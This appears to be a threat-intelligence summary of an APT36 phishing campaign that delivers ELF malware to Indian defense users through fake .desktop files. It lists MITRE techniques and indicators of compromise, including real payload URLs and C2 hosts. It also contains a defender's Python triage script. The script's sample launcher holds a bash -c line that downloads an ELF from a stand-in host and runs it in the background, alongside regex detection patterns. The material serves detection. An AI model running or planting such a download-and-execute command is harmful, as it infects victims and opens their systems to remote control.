Phishing Attack : Deploying Malware on Indian Defense BOSS Linux


APT36 (Transparent Tribe) has launched a sophisticated cyber-espionage campaign targeting the Indian defense sector with Linux-focused malware delivered via phishing emails. The campaign is multi-stage: a malicious .desktop file downloads a decoy PowerPoint presentation and executes an ELF binary payload to gain unauthorized access.

Key Points

  • APT36 targets Indian defense personnel with phishing emails containing ZIP archives that include malicious .desktop shortcut files designed for Linux environments, specifically BOSS Linux.
  • The malicious .desktop file downloads and opens a fake PowerPoint presentation while silently executing a harmful ELF binary named BOSS.elf.
  • The ELF payload executes reconnaissance, evasion, data discovery, and command-and-control functions, facilitating persistent access and data exfiltration.
  • The malicious infrastructure includes the domain sorlastore.com and associated subdomains, used for payload hosting and command-and-control communications.
  • MITRE ATT&CK techniques employed include phishing, scripting, masquerading, persistence via systemd services, and command and control over non-standard ports.
  • CYFIRMA recommends enhancing email security, user training, system hardening, network monitoring, threat intelligence integration, and regular patching to mitigate risks.
  • YARA rules and IOCs such as file hashes, domains, and IP addresses are provided to aid in detection and defense efforts.

MITRE Techniques

  • [T1566] Phishing – Delivery of malicious .desktop files via phishing emails. (‘phishing emails containing .desktop files’)
  • [T1566.001] Spear Phishing Attachment – ZIP file attachments carrying malicious shortcut files. (‘ZIP file containing a .desktop shortcut file’)
  • [T1064] Scripting – Execution of embedded bash commands in the .desktop file for multi-stage payload deployment. (‘Exec line initiates a Bash shell using the bash -c command’)
  • [T1543] Create or Modify System Process – Usage of systemd services for persistence. (‘Create or Modify System Process’, ‘Systemd Service’)
  • [T1543.003] Systemd Service – Malware’s persistence mechanism involving systemd services. (‘Systemd Service’)
  • [T1543.002] Systemd Service – Privilege escalation using systemd. (‘Create or Modify System Process’)
  • [T1036] Masquerading – Use of legitimate-looking icons and file names to disguise malicious files. (‘Icon=libreoffice-impress’, masquerading as presentation file)
  • [T1564] Hide Artifacts – Silent execution of malware without terminal windows. (‘Terminal=false’)
  • [T1564.001] Hidden Files and Directories – Use of /tmp directory and hidden execution to evade detection. (‘changing working directory to /tmp’)
  • [T1518] Software Discovery – Malware collects system information including hostname, CPU, RAM. (‘gathers system hostname, CPU, and RAM details’)
  • [T1518.001] Security Software Discovery – Malware inspects system services like CUPS via systemctl. (‘inspecting status of the CUPS service’)
  • [T1071] Application Layer Protocol – Command and control communication over TCP port 12520. (‘establish a TCP remote connection on port 12520’)
  • [T1095] Non-Application Layer Protocol – Maintaining connections regardless of user session. (‘nohup to run in the background’)
  • [T1105] Ingress Tool Transfer – Downloading payloads from attacker-controlled servers. (‘curl command to silently download malware’)
  • [T1571] Non-Standard Port – Use of custom TCP port 12520 for C2 communication. (‘command and control on port 12520’)
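A defender-side triage check for the launcher format described above, added here as an example and not taken from CYFIRMA's report or its YARA rules: it parses a Linux .desktop file and flags the traits the report attributes to the lure (a bash -c wrapper, a curl download, nohup, a /tmp working directory, an ELF launch, an office icon on a shell command, and Terminal=false). The two sample launchers and the example.invalid host are constructed for the test; the indicator names and the threshold of three hits are assumptions of this example.

```python
import configparser
import re

# Each indicator mirrors a behaviour the report attributes to the malicious Exec line.
INDICATORS = [
    ("shell_wrapper", r"\bbash\s+-c\b"),          # bash -c wrapper
    ("remote_download", r"\b(curl|wget)\b"),       # silent payload download
    ("background_exec", r"\bnohup\b"),             # survives session close
    ("tmp_workdir", r"\bcd\s+/tmp\b"),             # staging in /tmp
    ("elf_launch", r"\.elf\b"),                    # ELF payload launched
]

def parse_desktop(text: str) -> dict:
    """Return the [Desktop Entry] group; keys are case-sensitive in the spec."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str  # keep Exec/Icon/Terminal capitalisation
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}

def triage(text: str) -> dict:
    """Score one launcher; three or more indicators marks it suspicious (assumed threshold)."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    hits = [name for name, pat in INDICATORS if re.search(pat, exec_line)]
    # Masquerading: an office icon on an entry that actually runs a shell.
    if entry.get("Icon", "").startswith("libreoffice") and "bash" in exec_line:
        hits.append("office_icon_masquerade")
    # Hidden execution: no terminal shown while something is being fetched.
    if entry.get("Terminal", "true").lower() == "false" and "remote_download" in hits:
        hits.append("hidden_terminal")
    return {"exec": exec_line, "indicators": hits, "suspicious": len(hits) >= 3}

# Constructed samples (example.invalid is a placeholder, not the report's host).
LURE = """\
[Desktop Entry]
Type=Application
Name=Cyber-Security-Advisory
Icon=libreoffice-impress
Terminal=false
Exec=bash -c "cd /tmp && curl -s -o decoy.pptx https://example.invalid/decoy.pptx && curl -s -o BOSS.elf https://example.invalid/BOSS.elf && nohup ./BOSS.elf &"
"""
BENIGN = """\
[Desktop Entry]
Type=Application
Name=LibreOffice Impress
Icon=libreoffice-impress
Terminal=false
Exec=libreoffice --impress %U
"""
```

Run `triage(LURE)` and `triage(BENIGN)` to compare the two: the lure trips every indicator, the genuine Impress launcher trips none.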

Indicators of Compromise

  • [File Hash] Malicious files – Cyber-Security-Advisory.desktop (MD5: 6eb04445cad300c2878e8fbd3cb60b52), BOSS.elf (MD5: 18cf1e3be0e95be666c11d1dbde4588e), and additional hashes (SHA-256): 608fff2cd4b727799be762b95d497059a202991eb3401a55438071421b9b5e7a, ace379265be7f848d512b27d6ca95e43cef46a81dc15d1ad92ec6f494eed42ab
  • [Domain] Malicious domains used for hosting and command and control – sorlastore.com, govin.sorlastore.com, modgovin.onthewifi.com
  • [URL] Payload download locations – https://govin.sorlastore.com/uploads/Cyber-Security-Advisory.pptx, https://govin.sorlastore.com/uploads/BOSS.elf
  • [IP Address] Command and Control servers – 101.99.92.182 (C2 server), 169.254.169.254 (monitored for activity)
  • [File Name] Malicious payloads – Cyber-Security-Advisory.desktop, BOSS.elf, client.elf

Read more: https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/